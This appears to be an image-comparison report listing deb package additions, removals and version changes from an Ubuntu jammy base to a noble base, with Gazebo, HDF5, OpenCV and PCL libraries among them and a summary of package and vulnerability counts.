♾️	libgz-sensors8	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-air-pressure	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-air-pressure-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-air-speed	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-air-speed-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-altimeter	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-altimeter-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-boundingbox-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-boundingbox-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-core-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-depth-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-depth-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-dvl	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-dvl-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-force-torque	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-force-torque-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-gpu-lidar	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-gpu-lidar-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-imu	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-imu-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-lidar	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-lidar-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-logical-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-logical-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-magnetometer	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-magnetometer-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-navsat	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-navsat-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-rendering	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-rendering-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-rgbd-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-rgbd-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-segmentation-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-segmentation-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-thermal-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-thermal-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-wide-angle-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-wide-angle-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sim8	8.10.0-1~jammy	8.10.0-1~noble
♾️	libgz-sim8-dev	8.10.0-1~jammy	8.10.0-1~noble
♾️	libgz-sim8-plugins	8.10.0-1~jammy	8.10.0-1~noble
♾️	libgz-tools2-dev	2.0.3-1~jammy	2.0.3-1~noble
♾️	libgz-transport13	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-core-dev	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-dev	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-log	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-log-dev	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-parameters	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-parameters-dev	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-utils2	2.2.1-1~jammy	2.2.1-1~noble
♾️	libgz-utils2-cli-dev	2.2.1-1~jammy	2.2.1-1~noble
♾️	libgz-utils2-dev	2.2.1-1~jammy	2.2.1-1~noble
➕	libharfbuzz-cairo0		8.3.0-2build2
➕	libharfbuzz-dev		8.3.0-2build2
➕	libharfbuzz-gobject0		8.3.0-2build2
➕	libharfbuzz-icu0		8.3.0-2build2
➕	libharfbuzz-subset0		8.3.0-2build2
♾️	libharfbuzz0b	2.7.4-1ubuntu3.2	8.3.0-2build2
♾️	libhdf4-0-alt	4.2.15-4	4.2.16-4build1
♾️	libhdf4-alt-dev	4.2.15-4	4.2.16-4build1
➖	libhdf5-103-1	1.10.7+repack-4ubuntu2
➕	libhdf5-103-1t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-cpp-103-1	1.10.7+repack-4ubuntu2
➕	libhdf5-cpp-103-1t64		1.10.10+repack-3.1ubuntu4
♾️	libhdf5-dev	1.10.7+repack-4ubuntu2	1.10.10+repack-3.1ubuntu4
➖	libhdf5-fortran-102	1.10.7+repack-4ubuntu2
➕	libhdf5-fortran-102t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-hl-100	1.10.7+repack-4ubuntu2
➕	libhdf5-hl-100t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-hl-cpp-100	1.10.7+repack-4ubuntu2
➕	libhdf5-hl-cpp-100t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-hl-fortran-100	1.10.7+repack-4ubuntu2
➕	libhdf5-hl-fortran-100t64		1.10.10+repack-3.1ubuntu4
♾️	libhdf5-mpi-dev	1.10.7+repack-4ubuntu2	1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-103-1	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-103-1t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-cpp-103-1	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-cpp-103-1t64		1.10.10+repack-3.1ubuntu4
♾️	libhdf5-openmpi-dev	1.10.7+repack-4ubuntu2	1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-fortran-102	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-fortran-102t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-hl-100	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-hl-100t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-hl-cpp-100	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-hl-cpp-100t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-hl-fortran-100	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-hl-fortran-100t64		1.10.10+repack-3.1ubuntu4
♾️	libheif-dev	1.12.0-2build1	1.17.6-1ubuntu4.2
➕	libheif-plugin-aomdec		1.17.6-1ubuntu4.2
➕	libheif-plugin-libde265		1.17.6-1ubuntu4.2
♾️	libheif1	1.12.0-2build1	1.17.6-1ubuntu4.2
➖	libhiredis0.14	0.14.1-2
➕	libhiredis1.1.0		1.2.0-6ubuntu3
➖	libhogweed6	3.7.3-1build2
➕	libhogweed6t64		3.9.1-2.2build1.1
♾️	libhwasan0	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libhwloc-dev	2.7.0-2ubuntu1	2.10.0-1build1
♾️	libhwloc-plugins	2.7.0-2ubuntu1	2.10.0-1build1
♾️	libhwloc15	2.7.0-2ubuntu1	2.10.0-1build1
➕	libhwy1t64		1.0.7-8.1build1
♾️	libhyphen0	2.8.8-7build2	2.8.8-7build3
♾️	libibus-1.0-5	1.5.26-4	1.5.29-2
♾️	libibus-1.0-dev	1.5.26-4	1.5.29-2
♾️	libibverbs-dev	39.0-1	50.0-2ubuntu0.2
♾️	libibverbs1	39.0-1	50.0-2ubuntu0.2
♾️	libice-dev	2:1.0.10-1build2	2:1.0.10-1build3
♾️	libice6	2:1.0.10-1build2	2:1.0.10-1build3
♾️	libicu-dev	70.1-2	74.2-1ubuntu3.1
➖	libicu70	70.1-2

[JLP04]

Packages and Vulnerabilities (2992 package changes and 236 vulnerability changes)

• ➕ 855 packages added
• ➖ 681 packages removed
• ♾️ 1456 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2647 changes)

➕	libicu74		74.2-1ubuntu3.1
♾️	libidn2-0	2.3.2-2build1	2.3.7-2build1.1
♾️	libiec61883-0	1.2.0-4build3	1.2.0-6build1
➖	libignition-cmake2-dev	2.17.1-1~jammy
➖	libignition-math6	6.15.1-1~jammy
➖	libignition-math6-dev	6.15.1-1~jammy
➖	libilmbase-dev	2.5.7-2
➖	libilmbase25	2.5.7-2
♾️	libimagequant0	2.17.0-1	2.18.0-1build1
➕	libimath-3-1-29t64		3.1.9-3.1ubuntu2
➕	libimath-dev		3.1.9-3.1ubuntu2
♾️	libinput-bin	1.20.0-1ubuntu0.3	1.25.0-1ubuntu3.2
♾️	libinput10	1.20.0-1ubuntu0.3	1.25.0-1ubuntu3.2
♾️	libinstpatch-1.0-2	1.1.6-1	1.1.6-1build2
➖	libip4tc2	1.8.7-1ubuntu5.2
♾️	libisl23	0.24-2build1	0.26-3build1.1
♾️	libitm1	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libjack-jackd2-0	1.9.20~dfsg-1	1.9.21~dfsg-3ubuntu3
➕	libjansson4		2.14-2build2
♾️	libjbig-dev	2.1-3.1ubuntu0.22.04.1	2.1-6.1ubuntu2
♾️	libjbig0	2.1-3.1ubuntu0.22.04.1	2.1-6.1ubuntu2
♾️	libjpeg-dev	8c-2ubuntu10	8c-2ubuntu11
♾️	libjpeg-turbo8	2.1.2-0ubuntu1	2.1.5-2ubuntu2
♾️	libjpeg-turbo8-dev	2.1.2-0ubuntu1	2.1.5-2ubuntu2
♾️	libjpeg8	8c-2ubuntu10	8c-2ubuntu11
♾️	libjpeg8-dev	8c-2ubuntu10	8c-2ubuntu11
♾️	libjs-jquery	3.6.0+dfsg+~3.5.13-1	3.6.1+dfsg+~3.5.14-1
♾️	libjs-jquery-ui	1.13.1+dfsg-1	1.13.2+dfsg-1
♾️	libjs-sphinxdoc	4.3.2-1	7.2.6-6
♾️	libjs-underscore	1.13.2~dfsg-2	1.13.4~dfsg+~1.11.4-3
♾️	libjson-c-dev	0.15-3~ubuntu1.22.04.2	0.17-1build1
♾️	libjson-c5	0.15-3~ubuntu1.22.04.2	0.17-1build1
♾️	libjson-glib-1.0-0	1.6.6-1build1	1.8.0-2build2
♾️	libjson-glib-1.0-common	1.6.6-1build1	1.8.0-2build2
♾️	libjson-perl	4.04000-1	4.10000-1
♾️	libjsoncpp-dev	1.9.5-3	1.9.5-6build1
♾️	libjsoncpp25	1.9.5-3	1.9.5-6build1
➕	libjxl0.7		0.7.0-10.2ubuntu6.1
➖	libjxr0	1.2~git20170615.f752187-5
➕	libjxr0t64		1.2~git20170615.f752187-5.1ubuntu2
♾️	libk5crypto3	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	libkadm5clnt-mit12	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	libkadm5srv-mit12	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
➖	libkate1	0.4.1-11build1
➖	libkdb5-10	1.19.2-2ubuntu0.7
➕	libkdb5-10t64		1.20.1-6ubuntu2.6
♾️	libkeyutils1	1.6.1-2ubuntu3	1.6.3-3build1
♾️	libkml-dev	1.3.0-9	1.3.0-12build1
➖	libkmlbase1	1.3.0-9
➕	libkmlbase1t64		1.3.0-12build1
➖	libkmlconvenience1	1.3.0-9
➕	libkmlconvenience1t64		1.3.0-12build1
➖	libkmldom1	1.3.0-9
➕	libkmldom1t64		1.3.0-12build1
➖	libkmlengine1	1.3.0-9
➕	libkmlengine1t64		1.3.0-12build1
➖	libkmlregionator1	1.3.0-9
➕	libkmlregionator1t64		1.3.0-12build1
➖	libkmlxsd1	1.3.0-9
➕	libkmlxsd1t64		1.3.0-12build1
♾️	libkmod2	29-1ubuntu1	31+20240202-2ubuntu7.1
♾️	libkrb5-3	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	libkrb5-dev	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	libkrb5support0	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	libksba8	1.6.0-2ubuntu0.2	1.6.6-1build1
♾️	liblab-gamut1	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
♾️	liblapack-dev	3.10.0-2ubuntu1	3.12.0-3build1.1
♾️	liblapack3	3.10.0-2ubuntu1	3.12.0-3build1.1
♾️	liblbfgsb0	3.0+dfsg.3-10	3.0+dfsg.4-1build1
➕	liblc3-1		1.0.4-3build1
♾️	liblcms2-2	2.12~rc1-2build2	2.14-2build1
♾️	libldacbt-enc2	2.0.2.3+git20200429+ed310a0-4	2.0.2.3+git20200429+ed310a0-4ubuntu2
➖	libldap-2.5-0	2.5.19+dfsg-0ubuntu0.22.04.1
➕	libldap2		2.6.10+dfsg-0ubuntu0.24.04.1
♾️	liblept5	1.82.0-3build1	1.82.0-3build4
➕	liblerc-dev		4.0.0+ds-4ubuntu2
➕	liblerc4		4.0.0+ds-4ubuntu2
♾️	liblilv-0-0	0.24.12-2	0.24.22-1build1
➖	libllvm14	1:14.0.0-1ubuntu1.1
➖	libllvm15	1:15.0.7-0ubuntu0.22.04.3
➕	libllvm15t64		1:15.0.7-14build3
➕	libllvm18		1:18.1.3-1ubuntu1
➕	libllvm20		1:20.1.2-0ubuntu1~24.04.2
♾️	liblocale-gettext-perl	1.07-4build3	1.07-6ubuntu5
➕	liblrdf0		0.6.1-4build1
♾️	liblsan0	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libltc11	1.3.1-1	1.3.2-1build1
♾️	libltdl-dev	2.4.6-15build2	2.4.7-7build1
♾️	libltdl7	2.4.6-15build2	2.4.7-7build1
➕	liblttng-ctl0t64		2.13.11-2.1build4
➕	liblttng-ust-common1t64		2.13.7-1.1ubuntu2
➕	liblttng-ust-ctl5t64		2.13.7-1.1ubuntu2
➕	liblttng-ust-dev		2.13.7-1.1ubuntu2
➕	liblttng-ust-python-agent1t64		2.13.7-1.1ubuntu2
➕	liblttng-ust1t64		2.13.7-1.1ubuntu2
♾️	liblz4-1	1.9.3-2build2	1.9.4-1build1.1
♾️	liblz4-dev	1.9.3-2build2	1.9.4-1build1.1
♾️	liblzma-dev	5.2.5-2ubuntu1	5.6.1+really5.4.5-1ubuntu0.2
♾️	liblzma5	5.2.5-2ubuntu1	5.6.1+really5.4.5-1ubuntu0.2
➕	liblzo2-2		2.10-2build4
♾️	libmad0	0.15.1b-10ubuntu1	0.15.1b-10.2ubuntu1
♾️	libmad0-dev	0.15.1b-10ubuntu1	0.15.1b-10.2ubuntu1
♾️	libmagic-mgc	1:5.41-3ubuntu0.1	1:5.45-3build1
➖	libmagic1	1:5.41-3ubuntu0.1
➕	libmagic1t64		1:5.45-3build1
➕	libmbedcrypto7t64		2.28.8-1
♾️	libmd-dev	1.0.4-1build1	1.1.0-2build1.1
♾️	libmd0	1.0.4-1build1	1.1.0-2build1.1
♾️	libmd4c0	0.4.8-1	0.4.8-1build1
♾️	libmikmod-dev	3.3.11.1-6	3.3.11.1-7build1
♾️	libmikmod3	3.3.11.1-6	3.3.11.1-7build1
♾️	libminizip-dev	1.1-8build1	1:1.3.dfsg-3.1ubuntu2.1
➖	libminizip1	1.1-8build1
➕	libminizip1t64		1:1.3.dfsg-3.1ubuntu2.1
➖	libmjpegutils-2.1-0	1:2.1.0+debian-6build1
➕	libmjpegutils-2.1-0t64		1:2.1.0+debian-8.1build1
♾️	libmodplug1	1:0.8.9.0-3	1:0.8.9.0-3build1
➕	libmodule-implementation-perl		0.09-2
➕	libmodule-runtime-perl		0.016-2
♾️	libmount-dev	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	libmount1	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	libmp3lame0	3.100-3build2	3.100-6build1
♾️	libmpc3	1.2.1-2build1	1.3.1-1build1.1
♾️	libmpcdec6	2:0.1~r495-2	2:0.1~r495-2build1
➖	libmpdec3	2.5.1-2build2
➖	libmpeg2encpp-2.1-0	1:2.1.0+debian-6build1
➕	libmpeg2encpp-2.1-0t64		1:2.1.0+debian-8.1build1
♾️	libmpfr6	4.1.0-3build3	4.2.1-1build1.1
➖	libmpg123-0	1.29.3-1ubuntu0.1
➕	libmpg123-0t64		1.32.5-1ubuntu1.1
➖	libmplex2-2.1-0	1:2.1.0+debian-6build1
➕	libmplex2-2.1-0t64		1:2.1.0+debian-8.1build1
➕	libmro-compat-perl		0.15-2
➖	libmtdev1	1.1.6-1build4
➕	libmtdev1t64		1.1.6-1.1build1
➕	libmunge2		0.5.15-4ubuntu0.1
♾️	libmysofa1	1.2.1~dfsg0-1	1.3.2+dfsg-2ubuntu2
♾️	libmysqlclient-dev	8.0.44-0ubuntu0.22.04.2	8.0.45-0ubuntu0.24.04.1
♾️	libmysqlclient21	8.0.44-0ubuntu0.22.04.2	8.0.45-0ubuntu0.24.04.1
		Removed vulnerabilities (6):
➕	libnamespace-autoclean-perl		0.29-2
➕	libnamespace-clean-perl		0.27-2
♾️	libncurses6	6.3-2ubuntu0.1	6.4+20240113-1ubuntu2
♾️	libncursesw6	6.3-2ubuntu0.1	6.4+20240113-1ubuntu2
➕	libneon27t64		0.33.0-1.1build3
➖	libnetcdf-c++4	4.2-12build1
➖	libnetcdf-cxx-legacy-dev	4.2-12build1
♾️	libnetcdf-dev	1:4.8.1-1	1:4.9.2-5ubuntu4
➖	libnetcdf19	1:4.8.1-1
➕	libnetcdf19t64		1:4.9.2-5ubuntu4
➖	libnettle8	3.7.3-1build2
➕	libnettle8t64		3.9.1-2.2build1.1
♾️	libnghttp2-14	1.43.0-1ubuntu0.2	1.59.0-1ubuntu0.2
♾️	libnice10	0.1.18-2	0.1.21-2build3
♾️	libnl-3-200	3.5.0-0.1	3.7.0-0.3build1.1
♾️	libnl-3-dev	3.5.0-0.1	3.7.0-0.3build1.1
♾️	libnl-route-3-200	3.5.0-0.1	3.7.0-0.3build1.1
♾️	libnl-route-3-dev	3.5.0-0.1	3.7.0-0.3build1.1
♾️	libnorm-dev	1.5.9+dfsg-2	1.5.9+dfsg-3.1build1
➖	libnorm1	1.5.9+dfsg-2
➕	libnorm1t64		1.5.9+dfsg-3.1build1
♾️	libnotify4	0.7.9-3ubuntu5.22.04.1	0.8.3-1build2
➖	libnpth0	1.6-3build2
➕	libnpth0t64		1.6-3.1build1
➖	libnsl-dev	1.3.0-2build2
➖	libnsl2	1.3.0-2build2
♾️	libnspr4	2:4.35-0ubuntu0.22.04.1	2:4.35-1.1build1
♾️	libnss3	2:3.98-0ubuntu0.22.04.2	2:3.98-1build1
♾️	libnuma-dev	2.0.14-3ubuntu2	2.0.18-1ubuntu0.24.04.1
♾️	libnuma1	2.0.14-3ubuntu2	2.0.18-1ubuntu0.24.04.1
➖	liboctomap1.9	1.9.7+dfsg-3
➕	liboctomap1.9t64		1.9.7+dfsg-3.1build3
♾️	libodbc2	2.3.9-5ubuntu0.1	2.3.12-1ubuntu0.24.04.1
♾️	libodbccr2	2.3.9-5ubuntu0.1	2.3.12-1ubuntu0.24.04.1
♾️	libodbcinst2	2.3.9-5ubuntu0.1	2.3.12-1ubuntu0.24.04.1
➖	libode8	2:0.16.2-1
➕	libode8t64		2:0.16.2-1.1build1
♾️	libogdi-dev	4.1.0+ds-5	4.1.1+ds-3build1
♾️	libogdi4.1	4.1.0+ds-5	4.1.1+ds-3build1
♾️	libogg-dev	1.3.5-0ubuntu3	1.3.5-3build1
♾️	libogg0	1.3.5-0ubuntu3	1.3.5-3build1
♾️	libogre-1.9-dev	1.9.0+dfsg1-12.1ubuntu1	1.9.0+dfsg1-14.1build2
➕	libogre-1.9.0t64		1.9.0+dfsg1-14.1build2
➖	libogre-1.9.0v5	1.9.0+dfsg1-12.1ubuntu1
♾️	libogre-next-2.3-dev	2.3.1-8osrf~jammy	2.3.1-9osrf~noble
♾️	libogre-next-2.3.0	2.3.1-8osrf~jammy	2.3.1-9osrf~noble
♾️	libopenal-data	1:1.19.1-2build3	1:1.23.1-4build1
♾️	libopenal1	1:1.19.1-2build3	1:1.23.1-4build1
♾️	libopencv-calib3d-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-calib3d4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-calib3d406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-contrib-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-contrib4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-contrib406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-core-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-core4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-core406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-dnn-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-dnn4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-dnn406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-features2d-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-features2d4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-features2d406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-flann-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-flann4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-flann406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-highgui-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-highgui4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-highgui406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-imgcodecs-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-imgcodecs4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-imgcodecs406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-imgproc-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-imgproc4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-imgproc406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-ml-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-ml4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-ml406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-objdetect-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-objdetect4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-objdetect406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-photo-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-photo4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-photo406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-shape-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-shape4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-shape406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-stitching-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-stitching4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-stitching406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-superres-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-superres4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-superres406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-video-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-video4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-video406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-videoio-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-videoio4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-videoio406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-videostab-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-videostab4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-videostab406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-viz-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-viz4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-viz406t64		4.6.0+dfsg-13.1ubuntu1
➕	libopenexr-3-1-30		3.1.5-5.1build3
♾️	libopenexr-dev	2.5.7-1	3.1.5-5.1build3
➖	libopenexr25	2.5.7-1
♾️	libopengl-dev	1.4.0-1	1.7.0-1build1
♾️	libopengl0	1.4.0-1	1.7.0-1build1
➖	libopenh264-6	2.2.0+dfsg-2
➕	libopenh264-7		2.4.1+dfsg-1
♾️	libopenjp2-7	2.4.0-6ubuntu0.4	2.5.0-2ubuntu0.4
♾️	libopenjp2-7-dev	2.4.0-6ubuntu0.4	2.5.0-2ubuntu0.4
♾️	libopenmpi-dev	4.1.2-2ubuntu1	4.1.6-7ubuntu2
➖	libopenmpi3	4.1.2-2ubuntu1
➕	libopenmpi3t64		4.1.6-7ubuntu2
➖	libopenmpt0	0.6.1-1
➕	libopenmpt0t64		0.7.3-1.1build3
♾️	libopenni-dev	1.5.4.0+dfsg-5	1.5.4.0+dfsg-7.1build1
➖	libopenni0	1.5.4.0+dfsg-5
➕	libopenni0t64		1.5.4.0+dfsg-7.1build1
♾️	libopenni2-0	2.2.0.33+dfsg-15	2.2.0.33+dfsg-18
♾️	libopenni2-dev	2.2.0.33+dfsg-15	2.2.0.33+dfsg-18
♾️	libopus0	1.3.1-0.1build2	1.4-1build1
➖	liborc-0.4-0	1:0.4.32-2ubuntu0.1
➕	liborc-0.4-0t64		1:0.4.38-1ubuntu0.1
♾️	liborc-0.4-dev	1:0.4.32-2ubuntu0.1	1:0.4.38-1ubuntu0.1
♾️	liborc-0.4-dev-bin	1:0.4.32-2ubuntu0.1	1:0.4.38-1ubuntu0.1
♾️	liborocos-kdl-dev	1.5.1-2build1	1.5.1-4build1
♾️	liborocos-kdl1.5	1.5.1-2build1	1.5.1-4build1
♾️	libp11-kit0	0.24.0-6build1	0.25.3-4ubuntu2.1
➕	libpackage-stash-perl		0.40-1
♾️	libpackagekit-glib2-18	1.2.5-2ubuntu3	1.2.8-2ubuntu1.4
♾️	libpam-modules	1.4.0-11ubuntu2.6	1.5.3-5ubuntu5.5
♾️	libpam-modules-bin	1.4.0-11ubuntu2.6	1.5.3-5ubuntu5.5
♾️	libpam-runtime	1.4.0-11ubuntu2.6	1.5.3-5ubuntu5.5
♾️	libpam-systemd	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	libpam0g	1.4.0-11ubuntu2.6	1.5.3-5ubuntu5.5
♾️	libpango-1.0-0	1.50.6+ds-2ubuntu1	1.52.1+ds-1build1
➕	libpango1.0-dev		1.52.1+ds-1build1
♾️	libpangocairo-1.0-0	1.50.6+ds-2ubuntu1	1.52.1+ds-1build1
♾️	libpangoft2-1.0-0	1.50.6+ds-2ubuntu1	1.52.1+ds-1build1
♾️	libpangoxft-1.0-0	1.50.6+ds-2ubuntu1	1.52.1+ds-1build1
➕	libparams-classify-perl		0.015-2build5
➕	libparams-util-perl		1.102-2build3
➕	libparams-validationcompiler-perl		0.31-1
♾️	libpathplan4	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
➖	libpcap0.8	1.10.1-4ubuntu1.22.04.1
➕	libpcap0.8t64		1.10.4-4.1ubuntu3
♾️	libpciaccess-dev	0.16-3	0.17-3ubuntu0.24.04.2
♾️	libpciaccess0	0.16-3	0.17-3ubuntu0.24.04.2
➖	libpcl-apps1.12	1.12.1+dfsg-3build1
➕	libpcl-apps1.14		1.14.0+dfsg-1
➖	libpcl-common1.12	1.12.1+dfsg-3build1
➕	libpcl-common1.14		1.14.0+dfsg-1
♾️	libpcl-dev	1.12.1+dfsg-3build1	1.14.0+dfsg-1
➖	libpcl-features1.12	1.12.1+dfsg-3build1
➕	libpcl-features1.14		1.14.0+dfsg-1
➖	libpcl-filters1.12	1.12.1+dfsg-3build1
➕	libpcl-filters1.14		1.14.0+dfsg-1
➖	libpcl-io1.12	1.12.1+dfsg-3build1
➕	libpcl-io1.14		1.14.0+dfsg-1
➖	libpcl-kdtree1.12	1.12.1+dfsg-3build1
➕	libpcl-kdtree1.14		1.14.0+dfsg-1
